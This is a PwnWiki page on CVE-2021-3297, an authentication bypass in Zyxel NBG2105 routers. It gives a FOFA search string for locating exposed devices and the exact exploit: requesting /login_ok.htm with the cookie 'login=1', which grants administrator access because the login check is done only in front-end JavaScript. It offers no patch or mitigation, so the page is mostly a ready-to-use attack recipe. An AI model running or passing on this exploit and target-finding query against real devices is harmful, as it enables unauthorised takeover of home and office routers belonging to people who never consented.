CVE-2021-3297 Zyxel NBG2105 authentication bypass vulnerability

From PwnWiki
Revision as of 16:06, 6 April 2021 by Pwnwiki (talk | contribs) (Created page with "The front-end file <code>/js/util_gw.js</code> has the front-end verification of the <code>Cookie login</code> parameter.")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Other languages:
Chinese • ‎English • ‎español • ‎中文(繁體)‎

Vulnerability Impact

Zyxel NBG2105


FOFA

app="ZyXEL-NBG2105"

Xnip2021-04-06 09-32-28.jpg


The front-end file /js/util_gw.js has the front-end verification of the Cookie login parameter.

If you request the following, you will be redirected to the home.htm page as an administrator. 


http://xxx.xxx.xxx.xxx/login_ok.htm

Cookie: login=1;


Xnip2021-04-06 09-36-42.jpg

Retrieved from "https://pwnwiki.com/index.php?title=CVE-2021-3297_Zyxel_NBG2105_身份驗證繞過漏洞/en&oldid=1043"